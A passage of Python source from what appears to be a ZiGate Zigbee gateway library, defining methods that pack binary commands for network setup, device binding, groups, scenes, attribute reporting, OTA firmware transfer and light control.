data = struct.pack('!?', on)
return self.send_data(0x0018, data)
def set_certification(self, standard=1):
'''
Set Certification CE=1, FCC=2
'''
data = struct.pack('!B', standard)
return self.send_data(0x0019, data)
def permit_join(self, duration=30):
'''
start permit join
duration in secs, 0 means stop permit join
'''
return self.send_data(0x0049, 'FFFC{:02X}00'.format(duration))
def stop_permit_join(self):
'''
convenient function to stop permit_join
'''
return self.permit_join(0)
def set_extended_panid(self, panid):
'''
Set Extended PANID
'''
data = struct.pack('!Q', panid)
return self.send_data(0x0020, data)
def set_channel(self, channels=None):
'''
set channel
'''
channels = channels or [11, 14, 15, 19, 20, 24, 25]
if not isinstance(channels, list):
channels = [channels]
mask = functools.reduce(lambda acc, x: acc ^ 2 ** x, channels, 0)
mask = struct.pack('!I', mask)
return self.send_data(0x0021, mask)
def set_type(self, typ=TYPE_COORDINATOR):
'''
set zigate mode type
'''
data = struct.pack('!B', typ)
self.send_data(0x0023, data)
def get_network_state(self):
''' get network state '''
r = self.send_data(0x0009, wait_response=0x8009)
if r:
data = r.cleaned_data()
self._addr = data['addr']
self._ieee = data['ieee']
self.panid = data['panid']
self.extended_panid = data['extended_panid']
self.channel = data['channel']
return data
def start_network(self, wait=False):
''' start network '''
wait_response = None
if wait:
wait_response = 0x8024
r = self.send_data(0x0024, wait_response=wait_response)
if wait and r:
data = r.cleaned_data()
self._addr = data['addr']
self._ieee = data['ieee']
self.channel = data['channel']
return r
def start_network_scan(self):
''' start network scan '''
return self.send_data(0x0025)
def remove_device(self, addr):
''' remove device '''
if addr in self._devices:
ieee = self._devices[addr].ieee
if not ieee:
LOGGER.warning('No ieee for %s, silently removing the device', self._devices[addr])
self._remove_device(addr)
else:
ieee = self.__addr(ieee)
zigate_ieee = self.__addr(self.ieee)
data = struct.pack('!QQ', zigate_ieee, ieee)
return self.send_data(0x0026, data)
def remove_device_ieee(self, ieee):
''' remove device '''
device = self.get_device_from_ieee(ieee)
if device:
self.remove_device(device.addr)
def enable_permissions_controlled_joins(self, enable=True):
'''
Enable Permissions Controlled Joins
'''
enable = 1 if enable else 2
data = struct.pack('!B', enable)
return self.send_data(0x0027, data)
def _choose_addr_mode(self, addr_ieee):
'''
Choose the right address mode
'''
if len(addr_ieee) == 4:
addr_fmt = 'H'
if addr_ieee in self._groups:
addr_mode = 1 # AddrMode.group
elif addr_ieee in self._devices:
addr_mode = 2 # AddrMode.short
else:
addr_mode = 0 # AddrMode.bound
else:
addr_mode = 3 # AddrMode.ieee
addr_fmt = 'Q'
return addr_mode, addr_fmt
def _translate_addr(self, addr_ieee):
'''
translate ieee to addr if needed
'''
if len(addr_ieee) > 4:
return self.get_addr(addr_ieee)
return addr_ieee
def get_addr(self, ieee):
'''
retrieve short addr from ieee
'''
for d in self._devices.values():
if d.ieee == ieee:
return d.addr
LOGGER.error('Failed to retrieve short address for %s', ieee)
def _bind_unbind(self, cmd, ieee, endpoint, cluster,
dst_addr=None, dst_endpoint=1):
'''
bind
if dst_addr not specified, supposed zigate
'''
if not dst_addr:
dst_addr = self.ieee
addr_mode, addr_fmt = self._choose_addr_mode(dst_addr)
ieee = self.__addr(ieee)
dst_addr = self.__addr(dst_addr)
data = struct.pack('!QBHB' + addr_fmt + 'B', ieee, endpoint,
cluster, addr_mode, dst_addr, dst_endpoint)
wait_response = cmd + 0x8000
return self.send_data(cmd, data, wait_response)
def bind(self, ieee, endpoint, cluster, dst_addr=None, dst_endpoint=1):
'''
bind
if dst_addr not specified, supposed zigate
'''
return self._bind_unbind(0x0030, ieee, endpoint, cluster,
dst_addr, dst_endpoint)
def bind_addr(self, addr, endpoint, cluster, dst_addr=None,
dst_endpoint=1):
'''
bind using addr
if dst_addr not specified, supposed zigate
convenient function to use addr instead of ieee
'''
if addr in self._devices:
ieee = self._devices[addr].ieee
if ieee:
return self.bind(ieee, endpoint, cluster, dst_addr, dst_endpoint)
LOGGER.error('Failed to bind, addr %s, IEEE is missing', addr)
LOGGER.error('Failed to bind, addr %s unknown', addr)
def unbind(self, ieee, endpoint, cluster, dst_addr=None, dst_endpoint=1):
'''
unbind
if dst_addr not specified, supposed zigate
'''
return self._bind_unbind(0x0031, ieee, endpoint, cluster,
dst_addr, dst_endpoint)
def unbind_addr(self, addr, endpoint, cluster, dst_addr='0000',
dst_endpoint=1):
'''
unbind using addr
if dst_addr not specified, supposed zigate
convenient function to use addr instead of ieee
'''
if addr in self._devices:
ieee = self._devices[addr]['ieee']
return self.unbind(ieee, endpoint, cluster, dst_addr, dst_endpoint)
LOGGER.error('Failed to bind, addr %s unknown', addr)
def network_address_request(self, ieee):
''' network address request '''
target_addr = self.__addr('0000')
ieee = self.__addr(ieee)
data = struct.pack('!HQBB', target_addr, ieee, 0, 0)
r = self.send_data(0x0040, data, wait_response=0x8040)
if r:
return r.data['addr']
def ieee_address_request(self, addr):
''' ieee address request '''
target_addr = self.__addr('0000')
addr = self.__addr(addr)
data = struct.pack('!HHBB', target_addr, addr, 0, 0)
r = self.send_data(0x0041, data, wait_response=0x8041)
if r:
return r.data['ieee']
def node_descriptor_request(self, addr):
''' node descriptor request '''
return self.send_data(0x0042, addr)
def simple_descriptor_request(self, addr, endpoint):
'''
simple_descriptor_request
'''
addr = self.__addr(addr)
data = struct.pack('!HB', addr, endpoint)
return self.send_data(0x0043, data)
def power_descriptor_request(self, addr):
'''
power descriptor request
'''
return self.send_data(0x0044, addr)
def active_endpoint_request(self, addr):
'''
active endpoint request
'''
return self.send_data(0x0045, addr)
def leave_request(self, addr, ieee=None, rejoin=False,
remove_children=False):
'''
Management Leave request
rejoin : 0 do not rejoin, 1 rejoin
remove_children : 0 Leave, do not remove children
1 = Leave, removing children
'''
addr = self.__addr(addr)
if not ieee:
ieee = self._devices[addr]['ieee']
ieee = self.__addr(ieee)
data = struct.pack('!HQBB', addr, ieee, rejoin, remove_children)
return self.send_data(0x0047, data)
def lqi_request(self, addr='0000', index=0, wait=False):
'''
Management LQI request
'''
addr = self.__addr(addr)
data = struct.pack('!HB', addr, index)
wait_response = None
if wait:
wait_response = 0x804e
r = self.send_data(0x004e, data, wait_response=wait_response)
return r
def build_neighbours_table(self, force=False):
'''
Build neighbours table
'''
if force or not self._neighbours_table_cache:
self._neighbours_table_cache = self._neighbours_table(self.addr)
return self._neighbours_table_cache
def _neighbours_table(self, addr, nodes=None):
'''
Build neighbours table
'''
if nodes is None:
nodes = []
LOGGER.debug('Search for children of %s', addr)
nodes.append(addr)
index = 0
neighbours = []
entries = 255
while index < entries:
r = self.lqi_request(addr, index, True)
if not r:
LOGGER.error('Failed to build neighbours table')
return
data = r.cleaned_data()
entries = data['entries']
for n in data['neighbours']:
# bit_field
# bit 0-1 = u2RxOnWhenIdle 0/1
# bit 2-3 = u2Relationship 0/1/2
# bit 4-5 = u2PermitJoining 0/1
# bit 6-7 = u2DeviceType 0/1/2
is_parent = n['bit_field'][2:4] == '00'
is_child = n['bit_field'][2:4] == '01'
is_router = n['bit_field'][6:8] == '01'
if is_parent:
neighbours.append((n['addr'], addr, n['lqi']))
elif is_child:
neighbours.append((addr, n['addr'], n['lqi']))
elif n['depth'] == 0:
neighbours.append((self.addr, n['addr'], n['lqi']))
if is_router and n['addr'] not in nodes:
LOGGER.debug('%s is a router, search for children', n['addr'])
n2 = self._neighbours_table(n['addr'], nodes)
if n2:
neighbours += n2
index += data['count']
return neighbours
def refresh_device(self, addr, full=False):
'''
convenient function to refresh device attribute
'''
device = self.get_device_from_addr(addr)
if not device:
return
device.refresh_device(full)
def discover_device(self, addr, force=False):
'''
starts discovery process
'''
LOGGER.debug('discover_device %s', addr)
device = self.get_device_from_addr(addr)
if not device:
return
if force:
device.discovery = ''
device.info['mac_capability'] = ''
device.endpoints = {}
if device.discovery:
return
typ = device.get_type()
if typ:
LOGGER.debug('Found type')
if device.has_template():
LOGGER.debug('Found template, loading it')
device.load_template()
return
if 'mac_capability' not in device.info:
LOGGER.debug('no mac_capability')
self.node_descriptor_request(addr)
return
if not device.endpoints:
LOGGER.debug('no endpoints')
self.active_endpoint_request(addr)
return
if not typ:
return
if not device.load_template():
LOGGER.debug('Loading template failed, tag as auto-discovered')
device.discovery = 'auto-discovered'
for endpoint, values in device.endpoints.items():
for cluster in values.get('in_clusters', []):
self.attribute_discovery_request(addr, endpoint, cluster)
def _generate_addr(self):
addr = None
while not addr or addr in self._devices or addr in self._groups:
addr = random.randint(1, 0xffff)
return addr
@property
def groups(self):
'''
return known groups
'''
return self._groups
def get_group_for_addr(self, addr):
'''
return group for device addr
'''
groups = {}
for group, members in self._groups.items():
for member in members:
if member[0] == addr:
if member[1] not in groups:
groups[member[1]] = []
groups[member[1]].append(group)
continue
return groups
def _add_group(self, cmd, addr, endpoint, group=None):
'''
Add group
if group addr not specified, generate one
return group addr
'''
addr_mode = 2
addr = self.__addr(addr)
if not group:
group = self._generate_addr()
else:
group = self.__addr(group)
src_endpoint = 1
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
r = self.send_data(cmd, data)
group_addr = self.__haddr(group)
if r.status == 0:
self.__add_group(group_addr, self.__haddr(addr), endpoint)
return group_addr
def __add_group(self, group, addr, endpoint):
if group not in self._groups:
self._groups[group] = set()
self._groups[group].add((addr, endpoint))
def __remove_group(self, group, addr, endpoint):
'''
remove group for specified addr, endpoint
if group is None,
remove all group for specified addr, endpoint
'''
if group is None:
groups = list(self._groups.keys())
else:
groups = [group]
for group in groups:
if (addr, endpoint) in self._groups.get(group, set()):
self._groups[group].remove((addr, endpoint))
if group in self._groups and len(self._groups[group]) == 0:
del self._groups[group]
def _sync_group_membership(self, addr, endpoint, groups):
for group in groups:
self.__add_group(group, addr, endpoint)
to_remove = []
for group in self._groups:
if group not in groups:
to_remove.append(group)
for group in to_remove:
self.__remove_group(group, addr, endpoint)
def add_group(self, addr, endpoint, group=None):
'''
Add group
if group addr not specified, generate one
return group addr
'''
return self._add_group(0x0060, addr, endpoint, group)
def add_group_identify(self, addr, endpoint, group=None):
'''
Add group if identify ??
if group addr not specified, generate one
return group addr
'''
return self._add_group(0x0065, addr, endpoint, group)
def view_group(self, addr, endpoint, group):
'''
View group
'''
addr_mode = 2
addr = self.__addr(addr)
group = self.__addr(group)
src_endpoint = 1
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
return self.send_data(0x0061, data)
def get_group_membership(self, addr, endpoint, groups=[]):
'''
Get group membership
groups is list of group addr
if empty get all groups
'''
addr_mode = 2
addr = self.__addr(addr)
src_endpoint = 1
length = len(groups)
groups = [self.__addr(group) for group in groups]
data = struct.pack('!BHBBB{}H'.format(length), addr_mode, addr,
src_endpoint, endpoint, length, *groups)
return self.send_data(0x0062, data)
def remove_group(self, addr, endpoint, group=None):
'''
Remove group
if group not specified, remove all groups
'''
addr_mode = 2
addr = self.__addr(addr)
src_endpoint = 1
group_addr = group
if group is None:
data = struct.pack('!BHBB', addr_mode, addr,
src_endpoint, endpoint)
r = self.send_data(0x0064, data)
else:
group = self.__addr(group)
data = struct.pack('!BHBBH', addr_mode, addr,
src_endpoint, endpoint, group)
r = self.send_data(0x0063, data)
if r.status == 0:
self.__remove_group(group_addr, self.__haddr(addr), endpoint)
return r
def identify_device(self, addr, time_sec=5):
'''
convenient function that automatically find destination endpoint
'''
device = self._devices[addr]
device.identify_device(time_sec)
def identify_send(self, addr, endpoint, time_sec):
'''
identify query
'''
addr = self.__addr(addr)
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, time_sec)
return self.send_data(0x0070, data)
def identify_query(self, addr, endpoint):
'''
identify query
'''
addr = self.__addr(addr)
data = struct.pack('!BHBB', 2, addr, 1, endpoint)
return self.send_data(0x0071, data)
def view_scene(self, addr, endpoint, group, scene):
'''
View scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A0, data)
def add_scene(self, addr, endpoint, group, scene, name, transition=0):
'''
Add scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A1, data)
def remove_scene(self, addr, endpoint, group, scene=None):
'''
Remove scene
if scene is not specified, remove all scenes
'''
addr = self.__addr(addr)
group = self.__addr(group)
if scene is None:
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, group)
return self.send_data(0x00A3, data)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A2, data)
def store_scene(self, addr, endpoint, group, scene):
'''
Store scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A4, data)
def recall_scene(self, addr, endpoint, group, scene):
'''
Store scene
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBHB', 2, addr, 1, endpoint, group, scene)
return self.send_data(0x00A5, data)
def scene_membership_request(self, addr, endpoint, group):
'''
Scene Membership request
'''
addr = self.__addr(addr)
group = self.__addr(group)
data = struct.pack('!BHBBH', 2, addr, 1, endpoint, group)
return self.send_data(0x00A6, data)
def copy_scene(self, addr, endpoint, from_group, from_scene, to_group, to_scene):
'''
Copy scene
'''
addr = self.__addr(addr)
from_group = self.__addr(from_group)
to_group = self.__addr(to_group)
data = struct.pack('!BHBBBHBHB', 2, addr, 1, endpoint, 0,
from_group, from_scene,
to_group, to_scene)
return self.send_data(0x00A9, data)
def initiate_touchlink(self):
'''
Initiate Touchlink
'''
return self.send_data(0x00D0)
def touchlink_factory_reset(self):
'''
Touchlink factory reset
'''
return self.send_data(0x00D2)
def identify_trigger_effect(self, addr, endpoint, effect="blink"):
'''
identify_trigger_effect
effects available:
- blink: Light is switched on and then off (once)
- breathe: Light is switched on and off by smoothly increasing and then
decreasing its brightness over a one-second period, and then this is repeated 15 times
- okay: Colour light goes green for one second. Monochrome light flashes twice in one second.
- channel_change: Colour light goes orange for 8 seconds. Monochrome light switches to
maximum brightness for 0.5 s and then to minimum brightness for 7.5 s
- finish_effect: Current stage of effect is completed and then identification mode is
terminated (e.g. for the Breathe effect, only the current one-second cycle will be completed)
- Stop effect: Current effect and identification mode are terminated as soon as possible
'''
effects = {
'blink': 0x00,
'breathe': 0x01,
'okay': 0x02,
'channel_change': 0x0b,
'finish_effect': 0xfe,
'stop_effect': 0xff
}
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if effect not in effects.keys():
effect = 'blink'
effect_variant = 0 # Current Zigbee standard doesn't provide any variant
data = struct.pack('!B' + addr_fmt + 'BBBB', addr_mode, addr, 1, endpoint, effects[effect], effect_variant)
return self.send_data(0x00E0, data)
def read_attribute_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0):
'''
Read Attribute request
attribute can be a unique int or a list of int
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if not isinstance(attributes, list):
attributes = [attributes]
length = len(attributes)
manufacturer_specific = manufacturer_code != 0
for i in range(0, length, 10):
sub_attributes = attributes[i: i + 10]
sub_length = len(sub_attributes)
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}H'.format(sub_length), addr_mode, addr, 1,
endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, sub_length, *sub_attributes)
self.send_data(0x0100, data)
def write_attribute_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0):
'''
Write Attribute request
attribute could be a tuple of (attribute_id, attribute_type, data)
or a list of tuple (attribute_id, attribute_type, data)
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
fmt = ''
if not isinstance(attributes, list):
attributes = [attributes]
attributes_data = []
for attribute_tuple in attributes:
data_type = DATA_TYPE[attribute_tuple[1]]
fmt += 'HB' + data_type
attributes_data += attribute_tuple
length = len(attributes)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}'.format(fmt), addr_mode, addr, 1,
endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, length, *attributes_data)
self.send_data(0x0110, data)
def write_attribute_request_ias(self, addr, endpoint,
warning_mode, duration, strobe_cycle, strobe_level,
direction=0, manufacturer_code=0):
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBBBHBHBB', addr_mode, addr, 1,
endpoint,
direction, manufacturer_specific, manufacturer_code,
warning_mode, duration, strobe_cycle, strobe_level)
self.send_data(0x0111, data)
def write_attribute_request_ias_squawk(self, addr, endpoint,
squawk_mode_strobe_level,
direction=0, manufacturer_code=0):
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBBBHB', addr_mode, addr, 1,
endpoint,
direction, manufacturer_specific, manufacturer_code,
squawk_mode_strobe_level)
self.send_data(0x0112, data)
def reporting_request(self, addr, endpoint, cluster, attributes,
direction=0, manufacturer_code=0, min_interval=1, max_interval=3600):
'''
Configure reporting request
attribute could be a tuple of (attribute_id, attribute_type)
or a list of tuple (attribute_id, attribute_type)
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
if not isinstance(attributes, list):
attributes = [attributes]
length = len(attributes)
attribute_direction = 0
timeout = 0
change = 0
fmt = ''
attributes_data = []
for attribute_tuple in attributes:
fmt += 'BBHHHHB'
attributes_data += [attribute_direction,
attribute_tuple[1],
attribute_tuple[0],
min_interval,
max_interval,
timeout,
change
]
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!B' + addr_fmt + 'BBHBBHB{}'.format(fmt), addr_mode, addr, 1, endpoint, cluster,
direction, manufacturer_specific,
manufacturer_code, length, *attributes_data)
r = self.send_data(0x0120, data, 0x8120)
# reporting not supported on cluster 6, supposed on/off attribute
if r and r.status == 0x8c and r.cluster == 6:
device = self._devices[r.addr]
device.set_assumed_state()
return r
def ota_load_image(self, path_to_file):
# Check that ota process is not active
if self._ota['active'] is True:
LOGGER.error('Cannot load image while OTA process is active.')
self.get_ota_status()
return
# Try reading file from user provided path
try:
with open(path_to_file, 'rb') as f:
ota_file_content = f.read()
except OSError as err:
LOGGER.error('{path}: {error}'.format(path=path_to_file, error=err))
return False
if ota_file_content.startswith(b'NGIS'):
LOGGER.debug('Signed file, removing signature')
header_end = struct.unpack('<I', ota_file_content[0x10:0x14])[0]
footer_pos = struct.unpack('<I', ota_file_content[0x18:0x1C])[0]
ota_file_content = ota_file_content[header_end:footer_pos]
# Ensure that file has 69 bytes so it can contain header
if len(ota_file_content) < 69:
LOGGER.error('OTA file is too short')
return False
# Read header data
try:
header_data = list(struct.unpack('<LHHHHHLH32BLBQHH', ota_file_content[:69]))
except struct.error:
LOGGER.exception('Header is not correct')
return False
# Fix header str
# First replace null characters from header str to spaces
for i in range(8, 40):
if header_data[i] == 0x00:
header_data[i] = 0x20
# Reconstruct header data
header_data_compact = header_data[0:8] + [header_data[8:40]] + header_data[40:]
# Convert header data to dict
header_headers = [
'file_id', 'header_version', 'header_length', 'header_fctl', 'manufacturer_code', 'image_type',
'image_version', 'stack_version', 'header_str', 'size', 'security_cred_version', 'upgrade_file_dest',
'min_hw_version', 'max_hw_version'
]
header = dict(zip(header_headers, header_data_compact))
# Check that size from header corresponds to file size
if header['size'] != len(ota_file_content):
LOGGER.error('Header size({header}) and file size({file}) does not match'.format(
header=header['size'], file=len(ota_file_content)
))
return False
destination_address_mode = 0x02
destination_address = 0x0000
data = struct.pack('!BHlHHHHHLH32BLBQHH', destination_address_mode, destination_address, *header_data)
response = self.send_data(0x0500, data)
# If response is success place header and file content to variable
if response.status == 0:
LOGGER.info('OTA header loaded to server successfully.')
self._ota_reset_local_variables()
self._ota['image']['header'] = header
self._ota['image']['data'] = ota_file_content
else:
LOGGER.warning('Something wrong with ota file header.')
def _ota_send_image_data(self, request):
errors = False
# Ensure that image is loaded using ota_load_image
if self._ota['image']['header'] is None:
LOGGER.error('No header found. Load image using ota_load_image(\'path_to_ota_image\')')
errors = True
if self._ota['image']['data'] is None:
LOGGER.error('No data found. Load image using ota_load_image(\'path_to_ota_ota\')')
errors = True
if errors:
return
# Compare received image data to loaded image
errors = False
if request['image_version'] != self._ota['image']['header']['image_version']:
LOGGER.error('Image versions do not match. Make sure you have correct image loaded.')
errors = True
if request['image_type'] != self._ota['image']['header']['image_type']:
LOGGER.error('Image types do not match. Make sure you have correct image loaded.')
errors = True
if request['manufacturer_code'] != self._ota['image']['header']['manufacturer_code']:
LOGGER.error('Manufacturer codes do not match. Make sure you have correct image loaded.')
errors = True
if errors:
return
# Mark ota process started
if self._ota['starttime'] is False and self._ota['active'] is False:
self._ota['starttime'] = datetime.datetime.now()
self._ota['active'] = True
self._ota['transfered'] = 0
self._ota['addr'] = request['addr']
source_endpoint = 0x01
ota_status = 0x00 # Success. Using value 0x01 would make client to request data again later
# Get requested bytes from ota file
self._ota['transfered'] = request['file_offset']
end_position = request['file_offset'] + request['max_data_size']
ota_data_to_send = self._ota['image']['data'][request['file_offset']:end_position]
data_size = len(ota_data_to_send)
ota_data_to_send = struct.unpack('<{}B'.format(data_size), ota_data_to_send)
# Giving user feedback of ota process
self.get_ota_status(debug=True)
data = struct.pack('!BHBBBBLLHHB{}B'.format(data_size), request['address_mode'], self.__addr(request['addr']),
source_endpoint, request['endpoint'], request['sequence'], ota_status,
request['file_offset'], self._ota['image']['header']['image_version'],
self._ota['image']['header']['image_type'],
self._ota['image']['header']['manufacturer_code'],
data_size, *ota_data_to_send)
self.send_data(0x0502, data, wait_status=False)
def _ota_handle_upgrade_end_request(self, request):
if self._ota['active'] is True:
# Handle error statuses
if request['status'] == 0x00:
LOGGER.info('OTA image upload finnished successfully in {seconds}s.'.format(
seconds=(datetime.datetime.now() - self._ota['starttime']).seconds))
elif request['status'] == 0x95:
LOGGER.warning('OTA aborted by client')
elif request['status'] == 0x96:
LOGGER.warning('OTA image upload successfully, but image verification failed.')
elif request['status'] == 0x99:
LOGGER.warning('OTA image uploaded successfully, but client needs more images for update.')
elif request['status'] != 0x00:
LOGGER.warning('Some unexpected OTA status {}'.format(request['status']))
# Reset local ota variables
self._ota_reset_local_variables()
def _ota_reset_local_variables(self):
self._ota = {
'image': {
'header': None,
'data': None,
},
'active': False,
'starttime': False,
'transfered': 0,
'addr': None
}
def get_ota_status(self, debug=False):
if self._ota['active']:
image_size = len(self._ota['image']['data'])
time_passed = (datetime.datetime.now() - self._ota['starttime']).seconds
try:
time_remaining = int((image_size / self._ota['transfered']) * time_passed) - time_passed
except ZeroDivisionError:
time_remaining = -1
message = 'OTA upgrade address {addr}: {sent:>{width}}/{total:>{width}} {percentage:.3%}'.format(
addr=self._ota['addr'], sent=self._ota['transfered'], total=image_size,
percentage=self._ota['transfered'] / image_size, width=len(str(image_size)))
message += ' time elapsed: {passed}s Time remaining estimate: {remaining}s'.format(
passed=time_passed, remaining=time_remaining
)
else:
message = "OTA process is not active"
if debug:
LOGGER.debug(message)
else:
LOGGER.info(message)
def ota_image_notify(self, addr, destination_endpoint=0x01, payload_type=0):
"""
Send image available notification to client. This will start ota process
:param addr:
:param destination_endpoint:
:param payload_type: 0, 1, 2, 3
:type payload_type: int
:return:
"""
# Get required data from ota header
if self._ota['image']['header'] is None:
LOGGER.warning('Cannot read ota header. No ota file loaded.')
return False
image_version = self._ota['image']['header']['image_version']
image_type = self._ota['image']['header']['image_type']
manufacturer_code = self._ota['image']['header']['manufacturer_code']
source_endpoint = 0x01
destination_address_mode = 0x02 # uint16
destination_address = self.__addr(addr)
query_jitter = 100
if payload_type == 0:
image_version = 0xFFFFFFFF
image_type = 0xFFFF
manufacturer_code = 0xFFFF
elif payload_type == 1:
image_version = 0xFFFFFFFF
image_type = 0xFFFF
elif payload_type == 2:
image_version = 0xFFFFFFFF
data = struct.pack('!BHBBBLHHB', destination_address_mode, destination_address,
source_endpoint, destination_endpoint, 0,
image_version, image_type, manufacturer_code, query_jitter)
self.send_data(0x0505, data)
def attribute_discovery_request(self, addr, endpoint, cluster,
direction=0, manufacturer_code=0):
'''
Attribute discovery request
'''
addr = self.__addr(addr)
manufacturer_specific = manufacturer_code != 0
data = struct.pack('!BHBBHHBBHB', 2, addr, 1, endpoint, cluster,
0, direction, manufacturer_specific,
manufacturer_code, 255)
self.send_data(0x0140, data)
def available_actions(self, addr, endpoint=None):
'''
Analyse specified endpoint to found available actions
actions are:
- onoff
- move
- lock
- ...
'''
device = self.get_device_from_addr(addr)
if device:
return device.available_actions(endpoint)
@register_actions(ACTIONS_ONOFF)
def action_onoff(self, addr, endpoint, onoff, on_time=0, off_time=0, effect=0, gradient=0):
'''
On/Off action
onoff : 0 - OFF
1 - ON
2 - Toggle
on_time : timed on in sec
off_time : timed off in sec
effect : effect id
gradient : effect gradient
Note that timed onoff and effect are mutually exclusive
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, onoff)
cmd = 0x0092
if on_time or off_time:
cmd = 0x0093
data += struct.pack('!HH', on_time, off_time)
elif effect:
cmd = 0x0094
data = struct.pack('!BHBBBB', addr_mode, addr, 1, endpoint, effect, gradient)
return self.send_data(cmd, data)
@register_actions(ACTIONS_LEVEL)
def action_move_level(self, addr, endpoint, onoff=OFF, mode=0, rate=0):
'''
move to level
mode 0 up, 1 down
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBBB', addr_mode, addr, 1, endpoint, onoff, mode, rate)
return self.send_data(0x0080, data)
@register_actions(ACTIONS_LEVEL)
def action_move_level_onoff(self, addr, endpoint, onoff=OFF, level=0, transition_time=0):
'''
move to level with on off
level between 0 - 100
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
level = int(level * 254 // 100)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint, onoff, level, transition_time)
return self.send_data(0x0081, data)
@register_actions(ACTIONS_LEVEL)
def action_move_step(self, addr, endpoint, onoff=OFF, step_mode=0, step_size=0, transition_time=0):
'''
move step
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBBBH', addr_mode, addr, 1, endpoint, onoff,
step_mode, step_size, transition_time)
return self.send_data(0x0082, data)
@register_actions(ACTIONS_LEVEL)
def action_move_stop_onoff(self, addr, endpoint, onoff=OFF):
'''
move stop on off
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, onoff)
return self.send_data(0x0084, data)
@register_actions(ACTIONS_HUE)
def action_move_hue(self, addr, endpoint, hue, direction=0, transition=0):
'''
move to hue
hue 0-360 in degrees
direction : 0 shortest, 1 longest, 2 up, 3 down
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
hue = int(hue * 254 // 360)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint,
hue, direction, transition)
return self.send_data(0x00B0, data)
@register_actions(ACTIONS_HUE)
def action_move_hue_saturation(self, addr, endpoint, hue, saturation=100, transition=0):
'''
move to hue and saturation
hue 0-360 in degrees
saturation 0-100 in percent
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
hue = int(hue * 254 // 360)
saturation = int(saturation * 254 // 100)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint,
hue, saturation, transition)
return self.send_data(0x00B6, data)
@register_actions(ACTIONS_HUE)
def action_move_hue_hex(self, addr, endpoint, color_hex, transition=0):
'''
move to hue color in #ffffff
transition in second
'''
rgb = hex_to_rgb(color_hex)
return self.action_move_hue_rgb(addr, endpoint, rgb, transition)
@register_actions(ACTIONS_HUE)
def action_move_hue_rgb(self, addr, endpoint, rgb, transition=0):
'''
move to hue (r,g,b) example : (1.0, 1.0, 1.0)
transition in second
'''
hue, saturation, level = colorsys.rgb_to_hsv(*rgb)
hue = int(hue * 360)
saturation = int(saturation * 100)
level = int(level * 100)
self.action_move_level_onoff(addr, endpoint, ON, level, 0)
return self.action_move_hue_saturation(addr, endpoint, hue, saturation, transition)
@register_actions(ACTIONS_COLOR)
def action_move_colour(self, addr, endpoint, x, y, transition=0):
'''
move to colour x y
x, y can be integer 0-65536 or float 0-1.0
transition in second
'''
addr = self._translate_addr(addr)
if isinstance(x, float) and x <= 1:
x = int(x * 65536)
if isinstance(y, float) and y <= 1:
y = int(y * 65536)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBHHH', addr_mode, addr, 1, endpoint,
x, y, transition)
return self.send_data(0x00B7, data)
@register_actions(ACTIONS_COLOR)
def action_move_colour_hex(self, addr, endpoint, color_hex, transition=0):
'''
move to colour #ffffff
convenient function to set color in hex format
transition in second
'''
x, y = hex_to_xy(color_hex)
return self.action_move_colour(addr, endpoint, x, y, transition)
